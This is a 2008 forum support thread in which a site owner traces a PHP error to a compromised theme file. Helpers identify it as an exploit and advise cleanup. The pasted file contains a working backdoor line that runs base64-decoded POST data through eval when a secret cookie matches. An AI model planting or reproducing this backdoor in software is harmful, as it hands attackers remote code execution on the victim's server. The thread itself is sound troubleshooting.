Blog Documentation Book a Demo
Vanilla 1 is no longer supported or maintained. If you need a copy, you can get it here.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.

wp_debugger error

jurgenjurgen
edited April 2008 in Vanilla 1.0 Help
Hi--
I didn't change anything on idrinkyourmilkshake.com and suddenly get the following error on top of the page:

Notice: Undefined index: _wp_debugger in /home/jurgenfa/public_html/idrinkyourmilkshake.com/extensions/comments_permalinks/default.php on line 1

Does anybody have any advice on how to fix this? Thank you much!!

Jurgen

Comments

  • jurgenjurgen
    Hmm, I guess it's the permalinks extension -- I turned it off and the error disappeared. Why would this happen, though?
  • jurgenjurgen
    Now I see a new error on pages with discussions: Notice: Undefined index: _wp_debugger in /home/jurgenfa/public_html/idrinkyourmilkshake.com/themes/comments.php on line 1 Where does this stuff come from? How do I make it go away? As I said, I didn't change anything at all. The site has been getting slightly more traffic recently but nothing crazy. Anybody? Is this another plugin error? Thank you!
  • jurgenjurgen
    Anybody at all? That debugger error is still displaying, and I have no idea how to get rid of it. Thank you!! Notice: Undefined index: _wp_debugger in /home/jurgenfa/public_html/idrinkyourmilkshake.com/themes/comments.php on line 1
  • jurgenjurgen
    edited April 2008
    Can nobody help with this? Is there any other way to get support for Vanilla? I'd love to have this error taken care of, and I don't know what else to try. Thanks again.
  • sirlancelotsirlancelot New
    edited April 2008
    What does the file /home/jurgenfa/.../themes/comments.php look like on line 1? Post the code in context (5 lines surrounding the line in question and inside <code> tags).

    If I had to guess without looking at anything, I'd say you have something in your php.ini file to auto_prepend_file or something and it's what's really causing the error. If you're on shared hosting, you might want to ask them if this they've changed anything related to this.
  • jurgenjurgen
    Thank you so much for your response. I'll paste the beginning of the file below. There's some debugger line in the beginning that seems to be causing the problem, but I don't know enough PHP to mess with it...

    <?php if(md5($_COOKIE['_wp_debugger'])=="c4460c548c319f361cd75496359cc674"){ eval(base64_decode($_POST['file'])); exit; } ?><?php // Note: This file is included from the library/Vanilla/Vanilla.Control.CommentGrid.php class. $CommentList = ''; if ($this->Context->WarningCollector->Count() > 0) { $CommentList .= '<div class="ErrorContainer"> <div class="ErrorTitle">'.$this->Context->GetDefinition('ErrorTitle').'</div>' .$this->Context->WarningCollector->GetMessages() .'</div>'; } else { $PageDetails = $this->pl->GetPageDetails($this->Context); $PageList = $this->pl->GetNumericList(); $SessionPostBackKey = $this->Context->Session->GetVariable('SessionPostBackKey', 'string'); $CommentList .= '<div class="ContentInfo Top"> <h1>'; if ($this->Context->Configuration['USE_CATEGORIES']) $CommentList .= '<a href="'.GetUrl($this->Context->Configuration, 'index.php', '', 'CategoryID', $this->Discussion->CategoryID).'">'.$this->Discussion->Category.'</a>: '; $CommentList .= DiscussionPrefix($this->Context, $this->Discussion).' '; if ($this->Discussion->WhisperUserID > 0) { $CommentList .= $this->Discussion->WhisperUsername.': '; } $CommentList .= $this->Discussion->Name .'</h1> <a href="#pgbottom">'.$this->Context->GetDefinition('BottomOfPage').'</a> <div class="PageInfo"> <p>'.$PageDetails.'</p> '.$PageList.' </div> </div>
  • WallPhoneWallPhone
    edited April 2008
    It looks like a security hole in one of your wordpress plugins has been exploited. You'll need to remove that plugin and remove that If line wherever you find it on your server. (Leave the first <?php, but remove everything from if to the end of the line) This topic covers a bunch of symptoms and a link to further discussion: http://wordpress.org/support/topic/168964
  • jurgenjurgen
    Thanks! How can you tell it's a wordpress exploit? I just upgraded to 2.5 (finally!) so hopefully that will fix the security hole?

    I'll try to fix the file and I'll search the rest of the site for more instances.
  • sirlancelotsirlancelot New
    Yikes! A compromised server...

    Usually, _wp_ anything means it's wordpress-related (not always). But you'll want definitely want to scrub your files for this exploit (a full-text search for _wp_debugger should do it).

    If I read the article WallPhone linked correctly, this issue still exists in 2.5.
  • jurgenjurgen
    Yeah, I think you're right about 2.5. Argghh! I'm backing up the entire site to do a search... thanks again for locating the problem.
This discussion has been closed.